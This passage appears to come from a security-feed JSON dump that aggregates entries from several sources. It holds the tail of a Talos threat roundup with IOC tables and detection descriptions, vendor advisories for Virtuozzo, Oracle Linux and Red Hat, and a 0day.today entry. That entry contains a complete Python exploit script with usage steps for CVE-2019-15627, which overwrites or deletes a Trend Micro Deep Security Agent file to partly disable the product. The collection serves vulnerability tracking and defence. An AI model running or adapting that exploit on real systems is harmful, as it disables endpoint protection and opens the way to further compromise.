\n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\athnmuap ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\jcqwvdjy ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\piwcbjpe ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\dwkqpxds ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\fymsrzfu ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\xqekjrxm ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\qjxdckqf ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`67[.]195[.]228[.]110/31` | 15 \n`172[.]217[.]197[.]26/31` | 15 \n`69[.]55[.]5[.]250` | 14 \n`43[.]231[.]4[.]7` | 14 \n`64[.]233[.]186[.]26/31` | 14 \n`81[.]19[.]78[.]64/30` | 14 \n`98[.]136[.]96[.]74/31` | 14 \n`98[.]136[.]96[.]76/31` | 14 \n`85[.]114[.]134[.]88` | 14 \n`77[.]88[.]21[.]89` | 13 \n`209[.]85[.]202[.]26/31` | 13 \n`172[.]217[.]7[.]132` | 13 \n`213[.]180[.]193[.]89` | 12 \n`67[.]195[.]204[.]72/30` | 12 \n`148[.]163[.]158[.]5` | 11 \n`67[.]195[.]228[.]109` | 11 \n`67[.]195[.]228[.]94` | 10 \n`31[.]31[.]194[.]100/31` | 10 \n`98[.]136[.]96[.]92/31` | 10 \n`46[.]4[.]52[.]109` | 9 \n`67[.]195[.]204[.]79` | 9 \n`46[.]28[.]66[.]2` | 9 \n`78[.]31[.]67[.]23` | 9 \n`188[.]165[.]238[.]150` | 9 \n`93[.]179[.]69[.]109` | 9 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 14 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 14 \n`list[.]ru` | 13 \n`mx0b-001b2d01[.]pphosted[.]com` | 11 \n`mx[.]yandex[.]ru` | 9 \n`yandex[.]ru` | 9 \n`mta5[.]am0[.]yahoodns[.]net` | 9 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 9 \n`aol[.]com` | 9 \n`yahoo[.]co[.]uk` | 9 \n`irina94[.]rusgirls[.]cn` | 9 \n`anastasiasweety[.]rugirls[.]cn` | 9 \n`beautyrus[.]cn` | 9 \n`smtp[.]secureserver[.]net` | 8 \n`mxs[.]mail[.]ru` | 8 \n`mail[.]ru` | 8 \n`mx[.]yandex[.]net` | 8 \n`eur[.]olc[.]protection[.]outlook[.]com` | 8 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 8 \n`mx1[.]emailsrvr[.]com` | 8 \n`mx-apac[.]mail[.]gm0[.]yahoodns[.]net` | 7 \n`bk[.]ru` | 7 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 7 \n`inbox[.]ru` | 7 \n`smtp-in[.]orange[.]fr` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 16 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 16 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 14 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 14 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 14 \n`%TEMP%\\hjekdqa.exe` | 1 \n`%TEMP%\\yavbuhr.exe` | 1 \n \n#### File Hashes\n\n` 109ca5f094a4e98b6dac4191043bcbc4a9e849a456ca581226f42fdd7812966a 2835bade0deb4c1f1af1beff0102a7122990fd5b868f82b5f23b5ddea782d862 284d642a2ae70ba3890f39595cf215c06037f514580bcc8766b3c136cb1c4df9 2c84c7ac4fdbcaba7ac72b01a03d5ee7d62db4e4986670d17d420a45872f3158 30cadaa9bbf5f83ebad9e4738db169bacca7f78b4ae4256cc326533099dd64c2 64a3e41af01cf5443314c0d49d7a83f081c99dbadda2dfe2af5d93ff49464f4b 74ac087c43dc71971fddc1d65b4586b57d4b6ec6182914d0d176722a3a70b4bc 7c6e8e91b032ae87eb17d1ff4edfdbf9f3d2b7e6cc1849cadffd40650f073538 84c98359fa8967beb941ffa16550358d39e1fd005dccbc697267b6f170c08aeb 91637560be3528716ac0c5586b39c763c54798a0b03a55db086a3128fa665fee 973e8cb33dae5fab6505ffb140ad80587081f131bb6bb5305582e874ec8d10b0 d0ec6c954e91bde1e104cec6f316aa1d2f94389883d602790aec0128f492547c e46c3033d16ed60026ee74546aaaf17fe0e0dccfe9c40bd0b434758c01fc8a17 eab97c31815fc018ec26360c575b02ec3cf7595c1c4c6bcd121ee2123335515f eaf18fa3b771523ea252436b6dd15d1c2e0d6f93a17f5a861251dbc38f0cf951 f551911671d006e8164ba14c2024bbe55646f5e1ec6c4fb16b7f199c51be6864 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ufqU73JFz3o/XeqU7lz0kQI/AAAAAAAAC-U/jsKj0JmCJs4JClB6lqkg8u8lYarMfsM_wCLcBGAsYHQ/s1600/7c6e8e91b032ae87eb17d1ff4edfdbf9f3d2b7e6cc1849cadffd40650f073538_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-O1eXG01gPKk/XeqU_YsqxhI/AAAAAAAAC-Y/bOHq-MRqWrkuGNfTJYNSuI_832awUB2QwCLcBGAsYHQ/s1600/7c6e8e91b032ae87eb17d1ff4edfdbf9f3d2b7e6cc1849cadffd40650f073538_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/--DsBmJd-k1A/XeqVEntLd1I/AAAAAAAAC-c/B7JsgcpTtBsWGdOMHDsOTJc1CTyGeLMWwCLcBGAsYHQ/s1600/30cadaa9bbf5f83ebad9e4738db169bacca7f78b4ae4256cc326533099dd64c2_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Downloader.Phorpiex-7428338-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusOverride ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallOverride ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SYSTEMRESTORE \nValue Name: DisableSR ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesOverride ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AutoUpdateDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Services ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Services ` | 16 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Driver ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Driver ` | 1 \nMutexes | Occurrences \n---|--- \n`<random, matching [a-zA-Z0-9]{5,9}>` | 5 \n`5500330044` | 2 \n`60807405680` | 1 \n`65078708650` | 1 \n`55970850860` | 1 \n`459500033940` | 1 \n`8855858939` | 1 \n`959505030340` | 1 \n`3949400403930` | 1 \n`974795976050` | 1 \n`56495605470` | 1 \n`8800550044` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`193[.]32[.]161[.]77` | 10 \n`94[.]156[.]133[.]65` | 6 \n`92[.]63[.]197[.]153` | 5 \n`92[.]63[.]197[.]59` | 5 \n`92[.]63[.]197[.]60` | 3 \n`95[.]81[.]1[.]43` | 3 \n`193[.]32[.]161[.]73` | 2 \n`199[.]73[.]55[.]48` | 2 \n`193[.]32[.]161[.]69` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`teubeufubg[.]su` | 7 \n`weoghehofu[.]su` | 7 \n`xiheiufisd[.]su` | 7 \n`aieieieros[.]su` | 7 \n`teoghehofu[.]su` | 7 \n`weubeufubg[.]su` | 7 \n`xeoghehofu[.]su` | 7 \n`wniaeninie[.]su` | 7 \n`tieieieros[.]su` | 7 \n`xieieieros[.]su` | 7 \n`aeoghehofu[.]su` | 7 \n`wiaeufaehe[.]su` | 7 \n`weuaueudgs[.]su` | 7 \n`wbaeubuegs[.]su` | 7 \n`wieieieros[.]su` | 7 \n`abaeubuegs[.]su` | 7 \n`tbaeubuegs[.]su` | 7 \n`aniaeninie[.]su` | 7 \n`xbaeubuegs[.]su` | 7 \n`teuaueudgs[.]su` | 7 \n`wiheiufisd[.]su` | 7 \n`xniaeninie[.]su` | 7 \n`tiheiufisd[.]su` | 7 \n`aiheiufisd[.]su` | 7 \n`aeubeufubg[.]su` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\_\\DeviceManager.exe` | 17 \n`\\.lnk` | 17 \n`E:\\.lnk` | 17 \n`E:\\_` | 17 \n`E:\\_\\DeviceManager.exe` | 17 \n`%APPDATA%\\winsvcs.txt` | 16 \n`%SystemRoot%\\2043700216632254` | 2 \n`%SystemRoot%\\2043700216632254\\winpmmt.exe` | 2 \n`%SystemRoot%\\5037867818202168\\winxvbc.exe` | 1 \n`%SystemRoot%\\1751841511079533\\winhlyh.exe` | 1 \n`%SystemRoot%\\1927513612308752\\winqfmt.exe` | 1 \n`%SystemRoot%\\7596387610791212\\winthul.exe` | 1 \n`%SystemRoot%\\19947372186510550` | 1 \n`%SystemRoot%\\19947372186510550\\wingtph.exe` | 1 \n`%SystemRoot%\\7815933519548311` | 1 \n`%SystemRoot%\\7815933519548311\\winpyzz.exe` | 1 \n`%SystemRoot%\\4232647816716713` | 1 \n`%SystemRoot%\\4232647816716713\\winzsjy.exe` | 1 \n`%SystemRoot%\\9082268219092826` | 1 \n`%SystemRoot%\\9082268219092826\\winzpox.exe` | 1 \n`%SystemRoot%\\6188541715897433` | 1 \n`%SystemRoot%\\6188541715897433\\winngob.exe` | 1 \n`%SystemRoot%\\1917973613436861` | 1 \n`%SystemRoot%\\1917973613436861\\windcnw.exe` | 1 \n`%SystemRoot%\\4140102414092928` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 12c7c57286a5c532800495f1b9c8c5415dbaf5539aec177009845e9ac3508be3 22854dc3febbab0b72663b08bbdda7a4ee4dc501764876b2160a8d982700b4f8 22b67655c0bee80c3afb4da0811ab18da62ca2b053f958864131722708c30be1 506e17946a441837e8c42374d565cfc7331bf2e706124aa122710cf19f380fcf 5150389a6d1c556e7d99671f1d3fbed15e5fd5cf01f26ea9638f08708a77a36f 63eb4701bed59eeeeb937dcae9d28631c98c886cf4a72e38e851a0725641922f 6dde1772c9b506f82178de0a14ad8cc7721c5f0dafb22088703b1e8dade3adc6 6f7aa9178d9cfdc6b873d54740d08f8bbb73a53f2d52453ec904d1314f5153b6 75e85527ae7786063af164c13b8c7df2f248cb4e7253d41ef444a3b84aba5219 9c88188624210f684d7aab8447c2fb50882139cca5d1bdac72838c4e76650251 af0e787fd0b006c04b60eb5d69b815d053ef774fa2d0be00a246ce4a018e85cf be5004b5f58595bfdf4cb2f317bc7dfb2d66f50f1adabb177b76fdab997a21bb c0c1e55d87fc372bba9454d65f4f99b64ee2002743f4195cba72bae642beb7f9 cbab761baf4042ba54d4471df336c65cecf253e5d2ad0a61e51199bf4355f3a5 cfc2091a57f78ac04de77c5dd72aae7be27d5633d87b0d104430f50ade7b6a73 e2ac54ca79debd49bbe0efc028d43f6793f23a903f4410003c0eba709cdff406 f0b61687dea12c0981e6226eaa6bfe3889c710b1347c6c8a89eb220bd4dc3204 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-s3KcSHDhVNk/XeqVad3POXI/AAAAAAAAC-o/-2rJP5EFDdMXr03Qde4VjROrv4XzqC3DgCLcBGAsYHQ/s1600/63eb4701bed59eeeeb937dcae9d28631c98c886cf4a72e38e851a0725641922f_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-rBwtLqqTZaE/XeqVfiaPcOI/AAAAAAAAC-w/DeUNJjLMMqsoZHr1dYTIwz5Y4Xg8Cw36QCLcBGAsYHQ/s1600/63eb4701bed59eeeeb937dcae9d28631c98c886cf4a72e38e851a0725641922f_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-UT2OwCX62wM/XeqVmBgj-FI/AAAAAAAAC-0/jTbZpsoBv301wKIGtwkfr2NRnV-V41HPACLcBGAsYHQ/s1600/506e17946a441837e8c42374d565cfc7331bf2e706124aa122710cf19f380fcf_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (15141) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (348) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nDealply adware detected \\- (346) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nKovter injection detected \\- (334) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nExcessively long PowerShell command detected \\- (287) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nGamarue malware detected \\- (217) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (110) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nSpecial Search Offer adware \\- (40) \nSpecial Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware. \nReverse http payload detected \\- (26) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \nCorebot malware detected \\- (19) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \n \n", "modified": "2019-12-06T10:31:01", "published": "2019-12-06T10:31:01", "id": "TALOSBLOG:56EE545CE9B30B21AC2FD24C6DBB5181", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/VB8_-mJ1xSE/threat-roundup-1129-1206.html", "type": "talosblog", "title": "Threat Roundup for November 29 to December 6", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2019-12-06T15:25:27", "bulletinFamily": "unix", "description": "This update provides a security and a stability fix.\n**Vulnerability id:** CVE-2019-15681, PSBM-99817\nlibVNCServer-0.9.10 contains a memory leak in VNC server code, which may allow an attacker to read stack memory.\n\n", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "VZA-2019-093", "href": "https://help.virtuozzo.com/s/article/VZA-2019-093", "title": "Important product security update: Virtuozzo 6.0 Update 12 Hotfix 49 (6.0.12-3754)", "type": "virtuozzo", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2019-12-06T16:00:40", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "1337DAY-ID-33630", "href": "https://0day.today/exploit/description/33630", "title": "Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite Exploit", "type": "zdt", "sourceData": "# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite\r\n# Exploit Author : Peter Lapp\r\n# Vendor Homepage : https://www.trendmicro.com/en_us/business.html\r\n# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716\r\n# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.\r\n# CVE: 2019-15627\r\n\r\n# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)\r\n\r\n# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )\r\n# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with abritrary data hosted elsewhere (with limitations)\r\n# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS, \r\n# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired. \r\n\r\n# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.\r\n# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.\r\n# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file. \r\n# So the attacker can host a \"malicious\" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage, \r\n# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces, \r\n# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that \r\n# are ripe for the writing that can then point to a malicious binary.\r\n\r\n# Usage:\r\n# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part. \r\n# 2. Open a browser (preferrably IE) and start the script\r\n# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript).\r\n# 4. Keep refreshing the page until you see the script create the target file overwritten.\r\n#\r\n# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit. \r\n\r\n\r\nimport time\r\nimport os\r\nimport subprocess\r\nimport sys\r\nimport webbrowser\r\nfrom watchdog.observers import Observer\r\nfrom watchdog.events import FileSystemEventHandler\r\n\r\nclass Stage1_Handler(FileSystemEventHandler):\r\n\tdef __init__(self):\r\n\t\tself.filenames = []\r\n\tdef on_created(self, event):\r\n\t\tfilename = os.path.basename(event.src_path)\r\n\t\tif filename in self.filenames:\r\n\t\t\tprint ('Starting symlink creation.')\r\n\t\t\twatcher1.stop()\r\n\t\t\tsymlinkery(self.filenames)\r\n\t\telse:\r\n\t\t\tself.filenames.append(filename)\r\n\t\t\tprint ('File %s created.') % filename\r\n\t\t\t\r\nclass Stage2_Handler(FileSystemEventHandler):\r\n\tdef on_any_event(self, event):\r\n\t\tif os.path.basename(event.src_path) == 'dsa_control.cmd':\r\n\t\t\tprint \"Target file overwritten/deleted. Cleaning up.\"\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM CreateSymlink.exe\", shell=True)\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM Baitandswitch.exe\", shell=True)\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\\"')\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\test\"')\r\n\t\t\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp')\r\n\t\t\twatcher2.stop()\r\n\t\t\tsys.exit(0)\r\n\t\t\t\r\nclass Watcher(object):\r\n\tdef __init__(self, event_handler, path_to_watch):\r\n\t\tself.event_handler = event_handler\r\n\t\tself.path_to_watch = path_to_watch\r\n\t\tself.observer = Observer()\r\n\tdef run(self):\r\n\t\tself.observer.schedule(self.event_handler(), self.path_to_watch)\r\n\t\tself.observer.start()\r\n\t\ttry:\r\n\t\t\twhile True:\r\n\t\t\t\ttime.sleep(1)\r\n\t\texcept KeyboardInterrupt:\r\n\t\t\tself.observer.stop()\r\n\r\n\t\tself.observer.join()\r\n\tdef stop(self):\r\n\t\tself.observer.stop()\r\n\t\t\r\ndef symlinkery(filenames):\r\n\tprint \"Enter symlinkery\"\r\n\tfor filename in filenames:\r\n\t\tprint \"Creating symlink for %s\" % filename\r\n\t\tcmdname = \"start cmd /c CreateSymlink.exe \\\"C:\\\\test\\\\virus\\\\%s\\\" \\\"C:\\\\test\\\\test\\\\symtarget\\\"\" % filename\r\n\t\tsubprocess.Popen(cmdname, shell=True)\r\n\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig')\r\n\tos.system('mklink /J \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\" C:\\\\test')\r\n\twatcher2.run()\r\n\tprint \"Watcher 2 started\"\r\n\r\ntry:\r\n os.mkdir('C:\\\\test')\r\nexcept:\r\n pass\r\n\r\npath1 = 'C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\virus'\r\npath2 = 'C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\'\r\nwatcher1 = Watcher(Stage1_Handler,path1)\r\nwatcher2 = Watcher(Stage2_Handler,path2)\r\nswitcheroo = \"start cmd /c BaitAndSwitch.exe C:\\\\test\\\\test\\\\symtarget \\\"C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\dsa_control.cmd\\\" \\\"C:\\\\windows\\\\temp\\\\deleteme.txt\\\" d\"\r\nsubprocess.Popen(switcheroo, shell=True)\r\nwatcher1.run()\n\n# 0day.today [2019-12-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33630"}], "oraclelinux": [{"lastseen": "2019-12-06T17:26:21", "bulletinFamily": "unix", "description": "[68.3.0-1.0.1]\n- Update distribution for Oracle Linux [Orabug: 30143292]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file\n[68.3.0-1]\n- Update to 68.3.0 ESR\n[68.2.0-4]\n- Added patch for TLS 1.3 support.\n[68.2.0-3]\n- Rebuild\n[68.2.0-2]\n- Rebuild", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "ELSA-2019-4107", "href": "http://linux.oracle.com/errata/ELSA-2019-4107.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-06T09:26:43", "bulletinFamily": "unix", "description": "[68.3.0-1.0.1]\n- Rebuild to pickup Oracle default bookmarks [Orabug: 30069264]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file\n- Remove upstream references [Orabug: 30530527]\n[68.3.0-1]\n- Update to 68.3.0 ESR\n[68.2.0-4]\n- Added patch for TLS 1.3 support.\n[68.2.0-3]\n- Rebuild", "modified": "2019-12-05T00:00:00", "published": "2019-12-05T00:00:00", "id": "ELSA-2019-4111", "href": "http://linux.oracle.com/errata/ELSA-2019-4111.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2019-12-05T18:31:10", "bulletinFamily": "unix", "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.3.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Use-after-free in worker destruction (CVE-2019-17008)\n\n* Mozilla: Memory safety bugs fixed in Firefox 71 and Firefox ESR 68.3 (CVE-2019-17012)\n\n* Mozilla: Buffer overflow in plain text serializer (CVE-2019-17005)\n\n* Mozilla: Use-after-free when performing device orientation checks (CVE-2019-17010)\n\n* Mozilla: Use-after-free when retrieving a document in antitracking (CVE-2019-17011)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-12-05T23:02:21", "published": "2019-12-05T20:36:21", "id": "RHSA-2019:4111", "href": "https://access.redhat.com/errata/RHSA-2019:4111", "type": "redhat", "title": "(RHSA-2019:4111) Critical: firefox security update", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T16:27:10", "bulletinFamily": "unix", "description": "IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.\n\nThis update upgrades IBM Java SE 7 to version 7R1 SR4-FP55.\n\nSecurity Fix(es):\n\n* OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892) (CVE-2019-2978)\n\n* OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298) (CVE-2019-2989)\n\n* OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573) (CVE-2019-2945)\n\n* OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690) (CVE-2019-2962)\n\n* OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684) (CVE-2019-2964)\n\n* OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505) (CVE-2019-2973)\n\n* OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532) (CVE-2019-2981)\n\n* OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915) (CVE-2019-2983)\n\n* OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292) (CVE-2019-2988)\n\n* OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597) (CVE-2019-2992)\n\n* OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765) (CVE-2019-2999)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-12-05T20:16:08", "published": "2019-12-05T20:03:45", "id": "RHSA-2019:4110", "href": "https://access.redhat.com/errata/RHSA-2019:4110", "type": "redhat", "title": "(RHSA-2019:4110) Moderate: java-1.7.1-ibm security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-05T16:26:31", "bulletinFamily": "unix", "description": "IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.\n\nThis update upgrades IBM Java SE 7 to version 7R1 SR4-FP55.\n\nSecurity Fix(es):\n\n* OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892) (CVE-2019-2978)\n\n* OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298) (CVE-2019-2989)\n\n* OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573) 